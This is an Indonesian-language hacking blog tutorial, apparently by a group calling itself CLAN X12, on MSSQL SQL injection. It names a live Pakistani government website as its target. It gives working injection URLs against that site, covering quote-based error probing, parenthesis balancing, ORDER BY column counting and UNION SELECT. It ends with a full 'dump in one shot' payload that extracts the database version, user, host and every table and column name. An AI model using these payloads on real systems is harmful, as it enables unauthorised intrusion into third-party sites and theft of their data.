Assalamualaikum warahmatullahi wabarakatuh, alhamdulillahirobbilalamin.
Kembali lagi bersama saya, kali ini saya akan memberikan tutorial MSSQL injection, setelah memberikan tutorial cara SQL injection bagi pemula dan linknya ada di sini :: https://clan-x12.blogspot.com/2022/10/tutorial-sqlinjection-bagi-pemula.html
Kali ini saya akan menurunkan lagi tutorial MSSQL injection atau Microsoft SQL injection.
Baiklah tanpa berbasa-basi langsung saja kita ke tutorialnya.
Kali ini saya akan berikan live targetnya, dan ada dua target di sini. Live target:
1. http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310
Oke, penjelasan yang ingin saya sampaikan, jadi ada beberapa jenis tipe website, yang pertama itu "MYSQL"MSSQL"POSTGRE"ORACLE"SQLite" dan lain-lain dan kali ini saya akan menjelaskan tentang MS SQL seperti left target di atas yang sudah saya siapkan untuk materi kali ini.
Selain itu saya ingin menjelaskan juga tentang materi pertama yaitu tutorial SQL injection, saya mengatakan bahwa jika website itu memerlukan Bypass maka diosnya harus menggunakan bypass.
Tapi jika website itu tidak memerlukan bypass maka Dios nya biasa saja, tapi bagaimana dengan mssql ini?
Mssql ini memiliki Dios tersendiri dan mssql kerap sekali dengan yang namanya aspx dan website ini memiliki dua metode yaitu Union basic dan error basic, itu biasanya tiap seperti website di atas yang sudah saya sediakan untuk materi kita kali ini.
Langsung saja ke topik utama.
Pertama-tama kalian harus siapkan DH hackbar terlebih dahulu.
Setelah itu masukkan website yang sudah saya sediakan untuk kira-kira Gambaran seperti ini.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310
Itu adalah halaman utama dari website tersebut, langsung saja kita ke prosesnya cara menginjeksi website itu untuk parameter sudah saya sediakan juga, langsung saja kita berikan single quote Seperti apa tampilannya lihat di bawah ini.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310'
Perhatikanlah tampilan di atas Ketika saya berikan tanda single quote, Saya ingin memberitahukan pada umumnya errornya sebuah website mssql tampilan errornya seperti itu.
Langsung saja kita beri URL balancer untuk menormalkan tampilan website itu.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310'--+-
Tampilannya tetap error ketika kita sudah memberikan URL balancer Lalu bagaimana cara menormalkannya ya dengan cara memberikan ) pada single quote, Perhatikan website di bawah ini Ketika saya memberikan ) pada website tersebut, ingat setiap website berbeda ada juga website yang tak support single quote dan ada pun yang support.
Dan diwebsite kali ini hanya memerlukan ) untuk menormalkan webaite tersebut, ) "tutup kurung" itu sama seperti ibaratkan bypass hanya saja dalam bentuk yang berbeda, di DH Hackbar juga ada URL balancer seperti itu.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310')--+-
Nah ketika websitenya tidak ada single quote maka websitenya akan normal, itu dikarenakan websitenya tidak support single quote.
TPi di website kali ini hanya memerlukan ) untuk menormalkannya.
Lanjut kita hitung angka column dengan menggunakan order by, perhatikan gambar dibawah ini.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310') ORDER BY 6--+-
Ketika saya hitung kolomnya maka errornya berada di angka 6 dan normalnya di angka 5 Perhatikan gambar di bawah ini.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=NID-000310') ORDER BY 5--+-
Normalnya hanya ada di angka 5 dan error di angka 6 lalu next selanjutnya yaitu Union select fungsinya untuk memunculkan angka celah dalam proses SQL injection.
http://sindhlaws.gov.pk/NewsDetail.aspx?NewsID=-NID-000310') UNION SELECT 1,2,3,4,5--+-
Nah jangan lupa memberikan - pada parameter agar angkanya muncul Nah di situ terlihat ada angka 2 dan angka 3 langsung saja kita eksekusi dengan menggunakan Dios atau Dump in One Shot.
Untuk Dios mssql ini sangatlah berbeda pada Dios umumnya seperti apa diosnya?
'Injected By (./numb_X12) (CLAN X12)'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b'Host :: '%2b@@servername%2b'<'%2b'br>'%2b'<'%2b'br>'%2b(select+%2b' '%2btable_name%2b'::'%2bcolumn_name as t+from+information_schema.columns FOR XML PATH(''))
Perhatikan gambar dibawah websitenya sudah terinject
